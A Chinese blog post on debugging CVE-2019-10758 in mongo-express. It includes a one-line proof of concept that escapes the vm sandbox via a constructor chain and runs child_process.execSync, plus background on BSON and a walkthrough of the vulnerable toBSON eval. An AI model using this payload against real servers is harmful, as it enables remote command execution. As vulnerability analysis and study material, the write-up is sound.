CVE-2019-10758漏洞debug过程(nodejs)
CVE-2019-10758
根据https://github.com/masahiro331/CVE-2019-10758/blob/master/main.js的内容可知,在上一篇里已经讲了怎么debug调试nodejs。
所以在工作区新建一个test.js的文件。内容为:
exploit = "this.constructor.constructor(\"return process\")().mainModule.require(‘child_process‘).execSync(‘/Applications/CotEditor.app/Contents/MacOS/CotEditor‘)" var bson = require(‘mongo-express/lib/bson‘) bson.toBSON(exploit)
至于想执行的命令可以自行更改,我这边是运行一个mac下的软件。
根据poc可知,漏洞关键点在bson库里的toBSON函数。百度一下bson是什么东西?和json又有什么关系?
引用:https://blog.csdn.net/m0_38110132/article/details/77716792
参考百科说明:BSON( Binary Serialized Document Format) 是一种二进制形式的存储格式,采用了类似于 C 语言结构体的名称、对表示方法,支持内嵌的文档对象和数组对象,具有轻量性、可遍历性、高效性的特点,可以有效描述非结构化数据和结构化数据。
BSON是一种类json的一种二进制形式的存储格式,简称Binary JSON,它和JSON一样,支持内嵌的文档对象和数组对象,但是BSON有JSON没有的一些数据类型,如Date和BinData类型。
BSON可以做为网络数据交换的一种存储形式,这个有点类似于Google的Protocol Buffer,但是BSON是一种schema-less的存储形式,它的优点是灵活性高,但它的缺点是空间利用率不是很理想,
BSON有三个特点:轻量性、可遍历性、高效性。
例子
一个Document的BSON表示
{ title:"MongoDB", last_editor:"192.168.1.122", last_modified:new Date("27/06/2011"), body:"MongoDB introduction", categories:["Database","NoSQL","BSON"], revieved:false }
这是一个简单的BSON结构体,其中每一个element都是由key/value对组成的
一个嵌套的例子
{ name:"lemo", age:"12", address:{ city:"suzhou", country:"china", code:215000 } , scores:[ {"name":"english","grade:3.0}, {"name":"chinese","grade:2.0} ] }
这是一种相对复杂点的例子,其中包括了地址对象和分数对象数组,这里使用了嵌套文档对象与文档对象数据来表示单个学生的信息,这种嵌套的文档结构要使用关系数据库来做是比较复杂的。
与JSON的区别
以下内容参考自 http://blog.csdn.net/z69183787/article/details/26709505 感谢谢原作者。
BSON是由10gen开发的一个数据格式,目前主要用于MongoDB中,是mongodb的数据存储格式。BSON基于JSON格式,选择JSON进行改造的原因主要是JSON的通用性及JSON的schemaless的特性。
BSON主要会实现以下三点目标:
(1)更快的遍历速度
对JSON格式来说,太大的JSON结构会导致数据遍历非常慢。在JSON中,要跳过一个文档进行数据读取,需要对此文档进行扫描才行,需要进行麻烦的数据结构匹配,比如括号的匹配,而BSON对JSON的一大改进就是,它会将JSON的每一个元素的长度存在元素的头部,这样你只需要读取到元素长度就能直接seek到指定的点上进行读取了。
(2)操作更简易
对JSON来说,数据存储是无类型的,比如你要修改基本一个值,从9到10,由于从一个字符变成了两个,所以可能其后面的所有内容都需要往后移一位才可以。而使用BSON,你可以指定这个列为数字列,那么无论数字从9长到10还是100,我们都只是在存储数字的那一位上进行修改,不会导致数据总长变大。当然,在MongoDB中,如果数字从整形增大到长整型,还是会导致数据总长变大的。
(3)增加了额外的数据类型
JSON是一个很方便的数据交换格式,但是其类型比较有限。BSON在其基础上增加了“byte array”数据类型。这使得二进制的存储不再需要先base64转换后再存成JSON。大大减少了计算开销和数据大小。
但是,在有的时候,BSON相对JSON来说也并没有空间上的优势,比如对{“field”:7},在JSON的存储上7只使用了一个字节,而如果用BSON,那就是至少4个字节(32位)
目前在10gen的努力下,BSON已经有了针对多种语言的编码解码包。并且都是Apache 2 license下开源的。并且还在随着MongoDB进一步地发展。
exports.toBSON = function (string) { var sandbox = exports.getSandbox(); string = string.replace(/ISODate\(/g, ‘new ISODate(‘); string = string.replace(/Binary\(("[^"]+"),/g, ‘Binary(new Buffer($1, "base64"),‘); vm.runInNewContext(‘doc = eval((‘ + string + ‘));‘, sandbox); return sandbox.doc; };
跟踪来到第7行,发现eval和之前string代码进行拼接了。百度查看vm.runInNewContext的函数意义。
emmm。。。。运行js代码。。。那就直接拼接了代码。。。。直接执行了命令。
查看这个文件的history。发现修复方式是删除了vm这个库的引用。